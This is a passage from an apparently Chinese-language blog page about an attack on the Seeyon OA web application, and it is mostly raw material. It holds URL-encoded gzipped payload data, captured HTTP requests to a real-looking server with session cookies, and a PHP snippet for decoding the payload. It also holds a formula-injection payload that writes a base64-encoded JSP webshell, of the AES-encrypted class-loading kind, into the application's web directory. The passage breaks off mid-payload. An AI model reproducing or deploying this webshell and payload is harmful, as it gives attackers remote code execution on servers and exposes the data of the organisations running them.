2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00</span><br></pre></td></tr></table></figure>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">HTTP/1.1 <span class="number">500</span> </span><br><span class="line"><span class="attribute">Pragma</span>: No-cache</span><br><span class="line"><span class="attribute">Cache-Control</span>: no-cache</span><br><span class="line"><span class="attribute">Expires</span>: Thu, 01 Jan 1970 00:00:00 GMT</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json;charset=UTF-8</span><br><span class="line"><span class="attribute">Content-Length</span>: 51</span><br><span class="line"><span class="attribute">Date</span>: Wed, 16 Sep 2020 08:56:43 GMT</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Server</span>: SY8045</span><br><span class="line"><span class="attribute">Set-Cookie</span>: BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80; path=/; Httponly</span><br><span class="line"></span><br><span class="line">{"message":null,"code":"0246603709","details":null}</span><br></pre></td></tr></table></figure>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="string">GET</span> <span class="string">/seeyon/SeeyonUpdate1.jspx</span> <span class="string">HTTP/1.1</span></span><br><span class="line"><span class="attr">Host:</span> <span class="number">202.105</span><span class="number">.134</span><span class="number">.19</span></span><br><span class="line"><span class="attr">User-Agent:</span> <span class="string">Mozilla/5.0</span> <span class="string">(Macintosh;</span> <span class="string">Intel</span> <span class="string">Mac</span> <span class="string">OS</span> <span class="string">X</span> <span class="number">10.15</span><span class="string">;</span> <span class="string">rv:80.0)</span> <span class="string">Gecko/20100101</span> <span class="string">Firefox/80.0</span></span><br><span class="line"><span class="attr">Accept:</span> <span class="string">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span></span><br><span class="line"><span class="attr">Accept-Language:</span> <span class="string">zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span></span><br><span class="line"><span class="attr">Accept-Encoding:</span> <span class="string">gzip,</span> <span class="string">deflate</span></span><br><span class="line"><span class="attr">Connection:</span> <span class="string">close</span></span><br><span class="line"><span class="attr">Cookie:</span> <span class="string">JSESSIONID=1EE0AC538A01698F6B502A186FABFEA8;</span> <span class="string">BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80;</span> <span class="string">loginPageURL=</span></span><br><span class="line"><span class="attr">Upgrade-Insecure-Requests:</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="string">HTTP/1.1</span> <span class="number">200</span> </span><br><span class="line"><span class="attr">Content-Type:</span> <span class="string">text/html;charset=utf-8</span></span><br><span class="line"><span class="attr">Content-Length:</span> <span class="number">508</span></span><br><span class="line"><span class="attr">Date:</span> <span class="string">Wed,</span> <span class="number">16</span> <span class="string">Sep</span> <span class="number">2020</span> <span class="number">08</span><span class="string">:51:48</span> <span class="string">GMT</span></span><br><span class="line"><span class="attr">Connection:</span> <span class="string">close</span></span><br><span class="line"><span class="attr">Server:</span> <span class="string">SY8045</span></span><br></pre></td></tr></table></figure>
<h4 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h4><figure class="highlight perl"><table><tr><td class="code"><pre><span class="line"><?php $s = urldecode(<span class="string">"%1F%C2%8B%08%00%00%00%00%00%00%00%C2%B5X%5B%C2%93%C2%A2J%12%7E%C3%9E%C3%BD%15F%C2%BF%C3%B4L%C3%8Cl%0F%C2%A2%C3%8C%0C%7Bb%1ED%05%11%C2%A5%5B%C2%90%C3%AB%C3%86%3E%C3%88%C2%A5%01%29.%C3%93%C2%80%C2%8A%13%C3%A7%C2%BFo%16%17%C3%85%C3%96%C3%AE%C2%9D%C3%98%C3%98c%C2%84%21B%C2%91%C2%95%C2%95%C3%B9%7D_f%C3%95%C2%BF%7E%C3%9D%3F%27%2FQ%C2%816%C3%AB2u%C3%AF%C3%BF%C3%99%C3%AB%7F%C3%AE%C2%B5w%C3%84M%C2%84%C3%AF%C3%9C%C3%A7n%C2%96%C3%9F%C2%9FoO%0F%C3%A9%C2%8B%C2%9BeA%12%C3%A3%C2%87r%C3%BE%12%C3%84%5E%2F%C3%9D%C3%A4%7E%C3%AFG%C3%AF%C3%AE%C3%A1%C3%A1%C3%8B%C3%9E%C2%B56i%C2%9A%7D%C3%89%5C%C2%B7L%C3%A2%2Fw%7F%C3%BC%C2%BDW%7F%C3%BE%C2%B6%C3%9D%C3%AC6%0FA%C3%B2%C3%B0%04%C2%AF%C3%A4%C3%9AK%C2%90%C2%BB%2F%C2%BD%C3%B4%7CM%C2%82%C2%81%C3%98%C3%9D%C3%B7n%0C%C3%BB%C2%80%C3%AD%7F%C2%BA%C2%93%2B%C2%93J%C3%AAlr%C3%B7a%C2%9B%C2%A5%C2%87%C2%BB%C2%8F%27%C3%AB%C2%BD%C3%86%C2%93%C3%8Cw%11%C3%82%C2%AE%3Cq%C3%A9%C3%91%C2%9E%C2%A4%C2%A5E%C3%92%04%3F%C3%B3s%C2%8B%C2%A3%C2%8E%C2%8F%11%C2%BEG%04%C2%9B%C2%99D%C3%98%C2%93d%C2%B7+S%C3%9F%C2%89%C2%A6%C2%85%3DP%C2%8BE%24%C3%AE%2C%C2%99%16%C2%94%C3%BEh%C2%A7pll%C3%8A%C2%BC%C3%A7Dji%C2%93hgm%C2%89%60%29%0FK%7E%3B%C3%BC%C2%BE%C2%89%C3%85%C3%BDc%24%C2%A5v%C2%A4n%1D%0E%C2%91%C2%A6L%C3%AD%0D%C3%8DA%3C%C2%87r%C2%9B%C2%A3K%07%C3%9B%C2%8FX%C3%92%C2%90%C2%A9%3E%3C%C3%8F%16A%C2%92U%C3%BFu%C2%AF0%06s%C3%8A%C2%9EI%C2%BB%C2%9B%C3%B7%C3%80%C2%AE%C2%A9-%0B%21%C3%A0wO%C3%9B%C3%83O%7B0%C3%BAjr%C3%AA%C3%96%C3%A2%C3%98%C3%92%C3%90%C2%A5%C3%94%22%C2%87%C2%9F%C3%86%C2%AAH%C3%98%11*%C3%8C%C2%92%19%1A%C3%A5%C2%88%C3%A6%C3%87%3C%C2%B5%5C%C3%8F%C2%91q%C3%B4%C3%B6K%C2%92%2F%0DR%21%1E5%C2%85%C3%A0%C2%B7%C2%99%C3%87%C2%8FG%C2%9E2%C2%90%C3%8A%C2%8DF%C3%85%C3%BC%C2%8C%C3%B1%C3%AD%C3%81%C3%92%7B%C2%92G%C2%81%C2%A1%C2%8B%C2%A1%19%C3%A5%3FM%C3%9D%C3%B1M%C3%8E%08%1E%C3%8B%11%C2%8Ce%C3%96%C3%8El%C2%9EZ%C2%91%C3%ADY%C3%9A%C2%AA%C3%8FO%C2%88%C3%AAWh%C3%9E%13%C2%AA%C3%B9%C3%82o%C3%98%26%C3%8F%C2%89%19%C3%988%C3%B2%C2%AC%C3%A7%C2%99%C2%BAO%C2%98%1A%15%C3%9A%253%01%3F%C2%8F6q%C3%98%19%C2%9A%C2%84%C3%AC%C2%80%C2%A9%C3%87V_f%C3%AFh%C3%B3l%C2%A3-%3Dm%C3%AC%C2%BF%1E%C3%B7U%C2%90%C2%BBc%C3%AB%2F%C3%A4co%C3%AA%7C%C3%A2%06a%C3%97%0E%7D%C3%8B%C3%A6%C2%8A%3CT%3E*%C2%B2%1F%C2%B8%C2%BA%C2%84%C2%B4%3E%C3%A1%19%24%C2%9F%C3%B2%C2%B3%C3%8C%C2%BB%C2%B4%C3%8B%C2%94%C2%A6.%C3%B5%C3%ADh%C3%98%C3%9A%2F+%C2%BE%11%C3%84%0756%12x%2F%C3%A3%27%C2%A3%0C%C3%96%18%2C%C2%A2%03%C2%B2%22%C2%87%C3%98%C2%8Co%C3%B80%23j%3Fgj%60qh%C3%8Bss%C3%8A%C3%A1TK%C2%97%C2%99%C2%A1p%C2%BE%3E.%C3%86L%00%C3%B8%C3%8BL%C2%8D-x%C2%8E%C2%B8%C3%B4i%26%C2%95%C3%AE%C2%8D%C2%B5_%C3%A1%22%14S%C2%9B%C3%B3q%C2%AC%C2%B68%2Fo%3F%C2%A7bX%C3%9F%C3%9C%C2%8AE%C3%82%C3%90%C2%A8%C2%AD%29%7B%C3%81JQ%C3%97%C3%BCE%0C%C3%AB%C2%AFQR%C2%90kD%08%1C%C3%A1%3D%C2%95%C2%A3%03%3FI%C2%BCe%C2%B0%C3%B7%C2%ACH%1D%C3%B0%1C%C3%A6%04%3B%04%3E%C2%94%C2%AE%C3%8E%10VI%1Dm%C3%80%C3%A1%02%C2%89%08%C3%A6D%C3%8E4G%C2%AEZa5q%C2%B9ea%C2%92*%C2%B1%C2%8A%11a%C3%AA%C3%8BD%C2%90%C3%B7%1E%1F%C2%B2%C2%ACR%C3%B2%C2%A9%C2%B0%7E%3B%C3%BE0%7Fh%11%26%C3%B8%C3%80f%C3%82l%C2%99%C3%96%18%C2%AC%C2%BF%C3%8F2%C2%B3%05%C2%BCo7%C3%A3Q%22%C3%A9%C3%BE%C3%96%04%1F6%1A%0D%C3%B1S%C3%9E%C3%8D%C2%A9%15%C2%AB%C2%995%C3%A9%C3%86%C2%97h%C3%AC%5D%C3%A2%C3%85%1EH%C2%BE%C2%83s%C3%86%C2%9E%C2%B8%C2%94%C2%9B%13%259sey9%C3%8Fy%1C%C3%8C%C2%B5%02%0E1%C2%85%C2%A3%1D%C2%B2%C2%AE%C3%8F%C3%80%1D%C3%AA%C2%86o%3F%0D%C3%9D%C3%B4%C2%81%C3%97%107%C2%B5%C3%9C%C3%A8%12%C2%B5%08%C3%BB%C3%88%1E%C2%88%3E%C3%84l%C2%BA%01%C3%8D%C2%B0%07%2B%C3%8F%C2%BA%C2%8ES%7E%C3%8A%C2%B3L%1DMM%C2%84%C3%B5%21%C3%82%C2%95%29%C3%91%04%C3%9Ea%C2%AD%C2%918%04%C2%B9%16%C2%89E%C3%A4%40%3EP%C2%81%C3%97dE%22%12%C3%86sQ%C2%9A%28%C3%81%C2%8D%C3%98%C3%A7%C2%8B%180%C3%8F%C2%B1%C2%84%29%C3%BB%C3%87%C3%BA%C2%BD%0A%C2%A7Ga%1C%C3%96%C2%98%C2%9F-%0B%C2%8BS%0Bs+%25p%C3%AF%22%27u%3C%21%C3%B7c%C3%90%1C%C2%8EBN%C3%99%C2%AC-%C3%AAC%2C%C2%BDb%15%C2%A1X%C3%96%28%C3%90%02XS%C3%A0%1D%16x%3E%C3%90HX%C3%A7%C3%91%19%7B%C2%A9+S%C2%84%C3%95o%C3%A3%C3%A8%1D%C3%84+%2C%1C%C2%8EV%C3%AD%19%C2%83%C3%ACP%C3%B4mRI.%7C%C2%9Ea%0E%C2%B3%C2%84Az%C2%9E0U%C2%87%06%C2%A9%C3%AE%21g%3B%2B%60%C3%90%C2%A5%5E%5Ch%C3%82%C2%99%C3%9F%C2%91J4%C2%BA%C3%96%C3%B0%C2%95%C3%A9%1B%C3%91%215J%C3%A6%C3%A8%40%0C0%0EN%C3%B9%C3%A6%C3%A6x%7ER%C2%9C%C2%AA%C2%85A%C3%92%C2%A1%C3%99%C3%95%C2%91%18cAJ%C3%AC%C2%88%1E%C2%80%C3%86%C2%B1.%27%22%C3%A0%1C%C3%96b%C3%8F%C3%AD%C3%84%C2%A7%C3%95+%23b%C2%8F%C3%A6%C3%9A+%C2%BA%C2%B1%3B%C3%A3%C3%8A%C3%B4%C2%AD%C2%99%C2%8A*m%C2%BD%C3%82%C3%AAm-h%C3%AD%C3%A1w%C2%9A9%0A3%C2%A2%C3%8Bu%C3%84%C3%A6%C2%98%C3%9F%17u%26l%C3%961%C3%A6%C2%AFs7%C2%A5a%2C%C3%94%C2%AB1%C3%83%02Nv%C2%A0%7B%25%C2%B6%C3%99%C3%9A%C2%AF%C3%B1%C3%90G%0E%C3%A7%C3%AF%C3%8C%C2%B1%17%60NK%C2%A0%21%16%C2%895%1A4%C2%91%C2%A3%C3%BA%16%C2%B7O%17%C2%90%3F%27%C2%A2_p%C2%8C%C2%A0%06+q%C2%BB%3A%3D%C2%BB%C3%86%C3%8By%C2%BD%C3%82%C2%89C%C2%A1w%C2%B6%5B%C3%A9U%5D%0FJ%2F%C2%BD%C3%B2%C2%A1%19%C2%A7rt%5B%C2%9B%02%C3%80U%01u%C2%AB%7E%C2%A7%C2%9F%3B.%C3%99j-%C2%B5%C2%AD%C3%AE%0D%C2%88%C2%AE%C2%8F%C2%A7%C2%B5%C3%96%C3%AF%C3%99%C3%9E%C2%9A%C2%9C%C3%BF%04%3E%11Z%C2%BF%C3%BF%C3%8D%C2%88E%C3%BA%7F%C3%83%C3%9C%7B%C2%9C%C3%BF%C2%BD%C2%BC%C3%95%C3%BDF%3F%C2%B5%C3%89e%C2%B1%0A%C3%99%C2%B5%04c%3B%C3%B1%C2%BE%C2%8Ee%C2%8D%C3%AF%27%23JAKV%C2%9D%18b%3E%C2%B6y%C2%A7pl%C2%BA%C3%BA%C3%BF%C2%96%1D%C3%92%C3%90%0E%7DS%C3%86%C3%BD%C2%83%C3%9F%C3%866%C3%A5%5B%C3%BC%C3%A3%C2%BA%C2%885%C2%BD%C2%A9%C2%89%C3%80%5D%C2%9C%27%C3%90%1E%29%C2%B1%C3%88U%C3%82G-O*%5C%60-%C3%B8k%C3%B2%C3%91%C2%8D5%C3%94%09GS%C2%B0%C3%B66%C2%BES%C3%80u%263%C2%B4J%C3%B3l%0Bct%C3%8C%07%C3%82%C2%AB%C3%BBv%7B%C3%BFZ%0F%21n%22h%C2%97%C2%98%40%0C.xm%C2%AEo%C3%B6%0E%C3%B4%1B%C3%97%27%C3%8Di%7C%C3%BCv%C2%B3%3F%C2%98AN%C2%A0%C2%87%03%C3%BD9kK%C2%83%11%09%C3%B7x%C2%90%C3%8B3G%C2%98%C3%80%06%C2%9E%00%0FJk%C3%A0%1C%C3%B9K%2Cv%C2%B5%C2%AF%C3%A1%0E%C3%93r%C2%B1%C3%BB%C3%AC4O%27v%C2%BF%5B%C2%B7Z%7B%C3%B8%C2%9Df%0E*%C2%B2%06%C3%B3GC%C3%AB%C3%A3%C2%B86uM%05%1D%C3%9D%C2%83%C3%B67X%C2%BF%C3%91g%C2%B4%C3%B9%C3%A59%095%C3%98%C3%826%5B%C3%BB%15%C3%8E%C3%96%1A%C3%98%C3%A1%C3%A8%10%C3%ACb%C2%9CMa%7C%C2%ADO%C2%B8%1F%C3%81%3A9%0E%0B%C3%90O%C3%92%22s%24%C2%9C%C2%B0%7Ezv%C3%8D%C3%8B%C3%93zG%C2%89%C2%81%C3%BB%125w%C2%80%C2%BFak%C2%B7%C3%96%C2%99%C2%BA%C2%87%C2%85%3A%C3%B7%C3%9A%C2%87f%C2%9C%12%C2%B4%18%C2%ADy+Z%C2%BA%C2%9E%C2%B7%5C%01%C3%BCW%C3%B7h%C3%80%5Bj%C3%85%C3%A6n%03%C3%B5%C3%8Bl%C3%B2h%C2%B7%7DT%C2%AB%C2%B9l%C3%85%C2%8B%C3%A3%C2%B3%C3%BC%C2%AA%C2%8F%7C%0B%7FrxQ%5B%C3%9E%C2%AB%0F%C3%95%C3%B7%14%13%C3%A0s%C2%B3%C2%AEEd%C3%AE%C3%AC%C2%90%C3%B2-MI%C3%B8X%C3%AC%5B%01%C2%95otq%0B5%C2%82Q%08%5C%C3%ABN%C3%B9%C2%B8%C3%81%C2%8D%C3%9F%C3%8B%1D%5E%23%C3%94%7C%5CO%21%1E%C2%AF%C3%AA%C3%B7%C3%BF%3D%1F%C3%AA%C3%98%C3%91%C3%8C%08%C3%BB%C3%BB%C3%97%C3%A6%C3%A5%C2%BF%C3%B6%C2%A0%C3%A5%C2%ADZP%C3%B7%C2%98%C3%97%C3%97%C2%B8%0Fq%C3%B4y%C3%91%C3%96%C3%82%C2%B6%27y%1A%C3%937%C3%B7w%C3%8D%C2%9E%C3%B5%08%7Dv%0Ax%C3%88%C2%A0%C3%9F%C3%BC%C3%94%C3%A5h%1B%3F%C3%88%09%60g%C3%9A%C3%89G%C3%8B%1B%05z%15%C3%B5%C3%A0h%C2%B8%C3%AF%C2%AAt%7Be%C3%A8s%C3%80%C2%81J%C3%A0%C3%BD%C2%94%5Dq%C2%B9%C3%AD%C3%AD%C2%98%10%C3%A6%C3%B5q%C2%8Dr%C3%87%7Eu%0D%C2%B1%C2%8D%40_%C2%8Ff%1B%13%0EE%C2%80%C3%8F%23%C3%AE%3B%C3%B1%C3%BA%C3%AB%5C%C2%B1%04%C2%8E%C2%B7%01%C3%BC%C2%AFj%19%C3%87R%16G%C3%BB%26%C3%B4%1D%60%C2%8Bn%C3%BB%C2%81%C3%8B%C2%BD%C2%8E%C2%88%C3%BB%5E%C2%BC%C3%86%C3%82%C3%86%C2%B5E%C2%97%C2%B0%C3%96%05%0Eh%14%C3%A4xo%C3%A8%28%C2%B3H6%C3%A4%C3%9B%1C%C2%B1%1E%C3%B656%15%C3%98%C2%93%C3%87%12rg%C2%AB%5B5%C3%A9%C3%95%5E%C2%B2%C3%AA3%25%C2%A1%C2%8E%C3%8Di%C3%BF%01%C2%B9D%16%C3%8C%7F%C3%A9%C3%8F%1C%C3%99%C2%BA%C2%8A%C3%BB%C3%AF7%C3%BCic6%3F%C2%9E%7Dj%C3%B5%C2%B9%C2%8E%C2%95p%C3%89%C3%A7Sm6qM%1E%7BI%C3%A3k%C3%9A%5D%C2%BB%C3%B9%C3%AE%C3%9AC%C2%A8%C2%95PO%C2%89n%3F%7F1G%C2%B4%C2%A8r%C3%8Bfv%C3%A9Wg%0E%2B%C2%92%C2%86%3EZ%1D%3A%C2%97%C3%A3%C2%A0%26%C2%89%7B%C2%8B%C2%84%C2%BDC%1D%27%1D%C3%AF%1Fp%C3%BE%21%3E%C2%83%C3%AAZ%C3%B6%C3%B1%C2%9E%07%C2%9F%7B%40%2FR%C3%B7%C2%A7%02%C3%9E%03L%C2%A6%C3%A4%C2%ABu%C3%BD%C2%8E%C2%AD%16%C2%83M%7DW%12%C3%80%C3%93%15.%C3%8D%C3%A0b%0F%C2%90%C3%A2%C2%BD%22%C3%A0%08jyx%C2%B9W%C3%84%C2%B9%190%C2%90w%11Uxc%1D%C2%BCw%C2%AA%C3%B2%C2%BB%C2%88%C3%ABk%C2%81%C3%AB%C2%87%22%C3%AC%C2%8D%60Owl%C2%B8%C2%9F%2C%C3%97%C3%869%C3%A7%C3%BA%C3%BB%C2%BD%C3%9C%C3%B3z%C2%BF%C2%AB%C3%8Eqbq%0B%C3%BE%C3%80%C2%B3%03r%26%C3%83%C3%AF%0B%C3%B2%7Cf%C3%B4%C3%A4%C3%BD%C3%B8q%3E%C2%BC%C3%AAeE%C3%BC%10%05%C2%99%C3%BD%C3%80%C2%8C%C3%A4%C3%A9%C3%97%C3%A1%C3%84%C2%B5%13%C3%87%7D%C3%A99%C3%8Do%7Dtu%7B%C3%90%C2%87%C3%ABS%C2%AA%C3%BA%C2%B5%C3%A6O%C3%BDn%C3%BD%C3%A7Cc%C3%B0%C2%A1%C3%BEe%C2%8A%C3%A7g0P%1Dj%7D%C3%BC%7C%C2%A7%C2%AC%C3%99%7F%7C%C3%AF%1Ezu%C2%8F%C3%8F%1E%C2%AA%3F%28%C3%BE%C3%905%C3%BE%C3%96X%1B%25%C2%99%0B%C2%8E%C3%BD%C3%B9%07%3E%C3%9E%C2%83%0B%C3%87%7D%C3%AEe%C3%B9%26%0F%C3%AC%C3%9E%C3%A1p%C3%B8%C3%B0%C3%B1%C3%97%C3%BD%C2%9F%C2%9F%7B%C3%B7%C3%B7%C2%9F%7B%C2%BF%C3%B0o%C3%BER%C2%B8%C3%B7%C3%BF%C3%BE%0F%C2%A7%C3%92%C3%BC%C2%90.%14%00%00"</span>);</span><br><span class="line"></span><br><span class="line">$s = iconv(<span class="string">"UTF-8"</span>,<span class="string">"latin1"</span>,$s);</span><br><span class="line">$s = gzdecode($s);</span><br><span class="line">echo $s;</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<h4 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h4><figure class="highlight haxe"><table><tr><td class="code"><pre><span class="line">[{<span class="string">'formulaType'</span>: <span class="type">1</span>, <span class="string">'formulaName'</span>: <span class="type"></span>'test<span class="string">', '</span>formulaExpression<span class="string">': '</span><span class="keyword">String</span> path = <span class="string">"../webapps/seeyon/"</span>; java.io.PrintWriter printWriter2 = <span class="keyword">new</span> <span class="type">java</span>.io.PrintWriter(path+<span class="string">"SeeyonUpdate.jspx"</span>); <span class="keyword">String</span> shell = <span class="string">"PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgdmVyc2lvbj0iMS4yIj48anNwOmRpcmVjdGl2ZS5wYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YXguY3J5cHRvLiosamF2YXguY3J5cHRvLnNwZWMuKiIvPjxqc3A6ZGVjbGFyYXRpb24+CVN0cmluZyB4YyA9ICI5MTJlYzgwM2IyY2U0OWU0IjsgICAgU3RyaW5nIHBhc3MgPSAiYXNkZmtqZXdhZGYiOyAgICBTdHJpbmcgbWQ1ID0gbWQ1KHBhc3MgKyB4Yyk7ICAgIGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlciB7ICAgICAgICBwdWJsaWMgWChDbGFzc0xvYWRlciB6KSB7ICAgICAgICAgICAgc3VwZXIoeik7ICAgICAgICB9ICAgICAgICBwdWJsaWMgQ2xhc3MgUShieXRlW10gY2IpIHsgICAgICAgICAgICByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7ICAgICAgICB9ICAgIH0gICAgcHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLCBib29sZWFuIG0pIHsgICAgICAgIHRyeSB7ICAgICAgICAgICAgamF2YXguY3J5cHRvLkNpcGhlciBjID0gamF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7ICAgICAgICAgICAgYy5pbml0KG0gPyAxIDogMiwgbmV3IGphdmF4LmNyeXB0by5zcGVjLlNlY3JldEtleVNwZWMoeGMuZ2V0Qnl0ZXMoKSwgIkFFUyIpKTsgICAgICAgICAgICByZXR1cm4gYy5kb0ZpbmFsKHMpOyAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsgICAgICAgICAgICByZXR1cm4gbnVsbDsgICAgICAgIH0gICAgfSAgICBwdWJsaWMgc3RhdGljIFN0cmluZyBtZDUoU3RyaW5nIHMpIHsgICAgICAgIFN0cmluZyByZXQgPSBudWxsOyAgICAgICAgdHJ5IHsgICAgICAgICAgICBqYXZhLnNlY3VyaXR5Lk1lc3NhZ2VEaWdlc3QgbTsgICAgICAgICAgICBtID0gamF2YS5zZWN1cml0eS5NZXNzYWdlRGlnZXN0LmdldEluc3RhbmNlKCJNRDUiKTsgICAgICAgICAgICBtLnVwZGF0ZShzLmdldEJ5dGVzKCksIDAsIHMubGVuZ3RoKCkpOyAgICAgICAgICAgIHJldCA9IG5ldyBqYXZhLm1hdGguQmlnSW50ZWdlcigxLCBtLmRpZ2VzdCgpKS50b1N0cmluZygxNikudG9VcHBlckNhc2UoKTsgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7ICAgICAgICB9ICAgICAgICByZXR1cm4gcmV0OyAgICB9ICAgIHB1YmxpYyBzdGF0aWMgU3RyaW5nIGJhc2U2NEVuY29kZShieXRlW10gYnMpIHRocm93cyBFeGNlcHRpb24geyAgICAgICAgQ2xhc3MgYmFzZTY0OyAgICAgICAgU3RyaW5nIHZhbHVlID0gbnVsbDsgICAgICAgIHRyeSB7ICAgICAgICAgICAgYmFzZTY0ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOyAgICAgICAgICAgIE9iamVjdCBFbmNvZGVyID0gYmFzZTY0LmdldE1ldGhvZCgiZ2V0RW5jb2RlciIsIG51bGwpLmludm9rZShiYXNlNjQsIG51bGwpOyAgICAgICAgICAgIHZhbHVlID0gKFN0cmluZykgRW5jb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZW5jb2RlVG9TdHJpbmciLCBuZXdDbGFzc1tde2J5dGVbXS5jbGFzc30pLmludm9rZShFbmNvZGVyLCBuZXcgT2JqZWN0W117YnN9KTsgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7ICAgICAgICAgICAgdHJ5IHsgICAgICAgICAgICAgICAgYmFzZTY0ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RW5jb2RlciIpOyAgICAgICAgICAgICAgICBPYmplY3QgRW5jb2RlciA9IGJhc2U2NC5uZXdJbnN0YW5jZSgpOyAgICAgICAgICAgICAgICB2YWx1ZSA9IChTdHJpbmcpIEVuY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImVuY29kZSIsIG5ldyBDbGFzc1tde2J5dGVbXS5jbGFzc30pLmludm9rZShFbmNvZGVyLCBuZXcgT2JqZWN0W117YnN9KTsgICAgICAgICAgICAgICAgdmFsdWUgPSB2YWx1ZS5yZXBsYWNlKCJcbiIsICIiKS5yZXBsYWNlKCJcciIsICIiKTsgICAgICAgICAgICB9IGNhdGNoIChFeGNlcHRpb24gZTIpIHsgICAgICAgICAgICB9ICAgICAgICB9ICAgICAgICByZXR1cm4gdmFsdWU7ICAgIH0gICAgcHVibGljIHN0YXRpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBicykgdGhyb3dzIEV4Y2VwdGlvbiB7ICAgICAgICBDbGFzcyBiYXNlNjQ7ICAgICAgICBieXRlW10gdmFsdWUgPSBudWxsOyAgICAgICAgdHJ5IHsgICAgICAgICAgICBiYXNlNjQgPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7ICAgICAgICAgICAgT2JqZWN0IGRlY29kZXIgPSBiYXNlNjQuZ2V0TWV0aG9kKCJnZXREZWNvZGVyIiwgbnVsbCkuaW52b2tlKGJhc2U2NCwgbnVsbCk7ICAgICAgICAgICAgdmFsdWUgPSAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBuZXcgQ2xhc3NbXXtTdHJpbmcuY2xhc3N9KS5pbnZva2UoZGVjb2RlciwgbmV3IE9iamVjdFtde2JzfSk7ICAgICAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgeyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgIGJhc2U2NCA9IENsYXNzLmZvck5hbWUoInN1bi5taXNjLkJBU0U2NERlY29kZXIiKTsgICAgICAgICAgICAgICAgT2JqZWN0IGRlY29kZXIgPSBiYXNlNjQubmV3SW5zdGFuY2UoKTsgICAgICAgICAgICAgICAgdmFsdWUgPSAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBuZXcgQ2xhc3NbXXtTdHJpbmcuY2xhc3N9KS5pbnZva2UoZGVjb2RlciwgbmV3IE9iamVjdFtde2JzfSk7ICAgICAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUyKSB7ICAgICAgICAgICAgfSAgICAgICAgfSAgICAgICAgcmV0dXJuIHZhbHVlOyAgICB9PC9qc3A6ZGVjbGFyYXRpb24+PGpzcDpzY3JpcHRsZXQ+dHJ5IHsgICAgYnl0ZVtdIGRhdGEgPSBiYXNlNjREZWNvZGUocmVxdWVzdC5nZXRQYXJhbWV0ZXIocGFzcykpOyAgICBkYXRhID0geChkYXRhLCBmYWxzZSk7ICAgIGlmIChzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpID09IG51bGwpIHsgICAgICAgIHNlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIiwgbmV3IFgocGFnZUNvbnRleHQuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5RKGRhdGEpKTsg